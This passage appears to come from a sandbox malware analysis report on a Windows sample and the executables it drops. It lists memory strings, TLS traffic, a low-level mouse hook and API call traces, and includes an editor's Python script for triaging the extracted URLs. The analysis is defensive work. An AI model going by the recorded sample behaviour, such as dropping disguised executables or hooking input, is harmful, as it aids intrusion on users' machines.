0000000C.00000003.1801496747.000001F51FAD6000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1786800951.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1796414051.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1795346506.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801728812.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1787538248.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1800528739.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1787113599.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801496747.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 
0000000C.00000003.1795089608.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1838603027.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1830445848.000001E3DC935000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B5B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1660478746.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799411886.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799216805.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1797806840.000001F51FAD2000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1797806840.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1832667722.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1835274522.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1832667722.000001E3DC93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658955506.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1787538248.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1830735495.000001E3DC935000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digi
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B5B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662729581.0000021C65B53000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659206857.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659065496.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658955506.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658826355.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1660478746.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659345268.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662729581.0000021C65B5C000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662555024.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1661029096.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799411886.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1786800951.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1796414051.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1795346506.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801728812.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1787538248.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 
0000000C.00000003.1801728812.000001F51FAD3000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1800528739.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1787113599.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662729581.0000021C65B53000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659206857.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659065496.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658955506.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658826355.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659345268.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662555024.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1661029096.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662555024.0000021C65B5F000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801496747.000001F51FAD6000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1786800951.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1796414051.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1795346506.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801728812.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1787538248.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1800528739.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1787113599.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801496747.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: SystemUpdate.exe, 00000014.00000003.1853082415.000001C5F4D98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666700013.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713707881.0000029E6BE7B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667112966.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667988200.0000029E6BEDC000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666300025.0000029E6BEBB000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1665944774.0000029E6BED2000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666300025.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713338433.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1665944774.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666838129.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713963632.0000029E6DFF3000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666700013.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713432924.0000029E6DFF3000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666838129.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667199974.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713807345.0000029E6BEAC000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667199974.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 
00000001.00000002.1716654117.0000029E6BEAD000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667112966.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666476945.0000029E6BEBB000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666122628.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666700013.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713707881.0000029E6BE7B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667112966.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667988200.0000029E6BEDC000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666300025.0000029E6BEBB000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1665944774.0000029E6BED2000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666300025.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713338433.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1665944774.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666838129.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713963632.0000029E6DFF3000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666700013.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713432924.0000029E6DFF3000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666838129.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667199974.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713807345.0000029E6BEAC000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667199974.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 
00000001.00000002.1716654117.0000029E6BEAD000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667112966.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666476945.0000029E6BEBB000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666122628.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1668074546.0000029E6BF35000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mahler:8092/site-updates.py
Source: powershell.exe, 00000002.00000002.1809266140.000001C110073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1844983606.0000029158155000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000033.00000003.2369019176.000001FD3C8C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000033.00000003.2369019176.000001FD3C856000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B5B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662729581.0000021C65B53000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659206857.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659065496.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658955506.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658826355.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1660478746.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659345268.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662729581.0000021C65B5C000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662555024.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1661029096.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662555024.0000021C65B5F000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801496747.000001F51FAD6000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799411886.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1786800951.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1796414051.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1795346506.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 
0000000C.00000003.1801728812.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1787538248.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801728812.000001F51FAD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1660478746.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799411886.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1835274522.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.openssl.org/H
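The "String found in binary or memory" rows above mix three kinds of string: residue that PyInstaller-bundled CPython modules and PowerShell modules leave in memory, links to source files at a commit (the kind found in code comments), and strings that live in another process's memory (svchost.exe) and are not attributable to the sample. The script below is an added triage example written for this page; it is not part of the Joe Sandbox report and not code from the sample. SAMPLE_ROWS copies the URLs and their source processes from the rows above plus one constructed control row on a TEST-NET address so the review bucket is exercised; SAMPLE_PROCESSES and the one-line explanations in TOOLCHAIN_RESIDUE are the editor's reading of the report (the mahler:8092 URL is the example URL in the docstring of CPython's urllib.request module). extract_urls shows why the report lists .../CPS0 and .../H: a string scanner runs to the first non-printable byte, and in a DER-encoded certificate the byte after the CPS URI is a SEQUENCE tag, 0x30, which is the printable character '0'.

```python
import re
from collections import defaultdict

# (process the memory belongs to, string) rows taken from the report table above.
# The last row is a constructed control on a documentation (TEST-NET) address, not from the report.
SAMPLE_ROWS = [
    ("powershell.exe", "https://github.com/Pester/Pester"),
    ("T1#U52a9#U624b1.0.1.exe", "https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688"),
    ("T1#U52a9#U624b1.0.1.exe", "https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy"),
    ("T1#U52a9#U624b1.0.1.exe", "https://mahler:8092/site-updates.py"),
    ("powershell.exe", "https://nuget.org/nuget.exe"),
    ("svchost.exe", "https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe"),
    ("T1#U52a9#U624b1.0.1.exe", "https://www.digicert.com/CPS0"),
    ("SystemUpdate.exe", "https://www.openssl.org/H"),
    ("T1#U52a9#U624b1.0.1.exe", "https://203.0.113.10:8092/update.php"),  # constructed control row
]

# The sample and the copies it drops (from the report's Source column); assumption by the editor.
SAMPLE_PROCESSES = {"T1#U52a9#U624b1.0.1.exe", "WinHex.exe", "SystemUpdate.exe", "LineInst.exe"}

# Prefixes that toolchains and Windows components leave in memory. Prefixes come from the
# rows above; the explanations are the editor's.
TOOLCHAIN_RESIDUE = {
    "https://github.com/python/cpython/": "comment in CPython's importlib, bundled by PyInstaller",
    "https://mahler:8092/site-updates.py": "example URL in the urllib.request module docstring",
    "https://github.com/Pester/Pester": "Pester module text in PowerShell's memory",
    "https://nuget.org/nuget.exe": "PowerShellGet bootstrap URL for nuget.exe",
    "https://www.digicert.com/CPS": "CPS URI inside an embedded X.509 certificate",
    "https://www.openssl.org/": "OpenSSL banner string (libssl / _ssl.pyd)",
    "https://oneclient.sfx.ms/": "OneDrive installer URL in a Windows service process",
}

# Runs until the first byte that is not printable ASCII, like a plain string scanner.
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")


def extract_urls(blob: bytes) -> list[str]:
    """Pull URL-shaped strings out of raw bytes.

    A printable byte that merely follows the URL in the binary is kept, so a DER
    SEQUENCE tag (0x30) right after a CPS URI appears as a trailing '0'.
    """
    found: list[str] = []
    for m in URL_RE.finditer(blob):
        url = m.group().decode("ascii")
        if url not in found:
            found.append(url)
    return found


def classify(process: str, url: str) -> tuple[str, str]:
    """Return (bucket, reason) for one report row."""
    for prefix, why in TOOLCHAIN_RESIDUE.items():
        if url.startswith(prefix):
            return "toolchain_residue", why
    if process not in SAMPLE_PROCESSES:
        return "other_process", f"found in {process}, not in the sample or its dropped copies"
    if url.startswith("https://github.com/") and "/blob/" in url:
        return "source_reference", "link to a file at a commit, typical of a source-code comment"
    return "review", "no known origin; correlate with the TLS flows and Suricata alerts"


def triage(rows) -> dict[str, list[tuple[str, str, str]]]:
    """Bucket every (process, url) row; 'review' is what the analyst looks at first."""
    buckets: dict[str, list[tuple[str, str, str]]] = defaultdict(list)
    for process, url in rows:
        bucket, why = classify(process, url)
        buckets[bucket].append((process, url, why))
    return dict(buckets)


# Constructed bytes (not a dump from the report): a CPS URI followed by a DER SEQUENCE tag
# 0x30 and a length byte 0x82, then a null-terminated docstring URL.
SAMPLE_BLOB = (
    b"\x00\x1chttps://www.digicert.com/CPS\x30\x82\x03\x10"
    + b"\x00" * 4
    + b"https://mahler:8092/site-updates.py\x00"
)

if __name__ == "__main__":
    for url in extract_urls(SAMPLE_BLOB):
        print("string:", url)
    for bucket, items in triage(SAMPLE_ROWS).items():
        print(f"\n[{bucket}]")
        for process, url, why in items:
            print(f"  {process:28s} {url}\n      {why}")
```

On the report's own rows the review bucket stays empty: nothing in this table is operator infrastructure. The HTTP-on-port-443 rows that follow are the other half of the picture, five TLS sessions (client ports 49672, 49675, 49780, 49813 and 50227) whose destination hosts these rows do not show; the Suricata alerts named in the signature list are where that goes.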
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50227
Source: unknown | Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50227 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown | Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49813
Source: C:\Users\user\AppData\WinHex.exe | Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0054B1B1 NtQueryLicenseValue
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0054B274 NtQueryLicenseValue
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_004E7ACA NtPowerInformation
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0052B0B2 RtlDosPathNameToNtPathName_U,NtCreateFile,GetProcessHeap,HeapAlloc,NtQueryInformationFile,wcsncmp,GetProcessHeap,HeapFree,NtClose,GetProcessHeap,HeapFree,NtClose,GetProcessHeap,HeapAlloc,GetLastError,GetLastError,NtSetInformationFile,GetProcessHeap,HeapFree
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_005211C8 GetFileInformationByHandle,NtQueryInformationFile,RtlNtStatusToDosError,SetLastError,WriteFile
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0050D55E NtYieldExecution,GetProcessHeap,HeapAlloc
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0050CACB NtYieldExecution
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0050FABD NtYieldExecution
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_004FDD47 CreateFileW,memset,GetProcessHeap,HeapFree,GetFileInformationByHandle,GetFileInformationByHandleEx,SetFileInformationByHandle,GetProcessHeap,HeapAlloc,_wcsicmp,FindClose,NtSetInformationFile,NtSetInformationFile,RtlNtStatusToDosError,CreateFileW,SetFileInformationByHandle,GetLastError,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetLastError,GetLastError,CloseHandle,GetLastError,DeleteFileW,GetLastError,GetProcessHeap,HeapFree,SetLastError
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0051CD74 CreateFileW,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQueryInformationFile,OpenProcess,NtQueryInformationProcess,GetProcessHeap,HeapAlloc,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetLastError,GetLastError,GetLastError
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0050FD1E NtYieldExecution,GetProcessHeap,HeapAlloc
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_0054AE25 LoadLibraryExW,GetProcAddress,NtQueryLicenseValue,FreeLibrary
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Code function: 13_2_004FE3BE: CreateFileW,DeviceIoControl,GetLastError,CloseHandle,GetLastError,GetProcessHeap,HeapFree,SetLastError,SetLastError
Source: C:\Users\user\AppData\LineInst.exe | File created: C:\Windows\Logs\MoSetup\BlueBox.log
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6736780
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6755D6C
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6746714
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6754E20
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6746F98
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6740FB4
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6742800
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A674D718
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6744F50
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A675509C
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A674D098
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A67380A0
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6755820
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6746714
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6740DB0
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6752D30
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6746560
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A674FA08
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6741E70
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6748BA0
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6740BA4
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A67413C4
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A674CC04
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6742C04
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6758B68
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A6731B90
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A67409A0
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A67509B4
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A67411C0
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A67531CC
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A674FA08
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BF4E20
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BF5D6C
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BD6780
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BE6714
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BE1E70
Source: C:\Users\user\AppData\WinHex.exe | Code function: 12_2_00007FF7C5BE0DB0
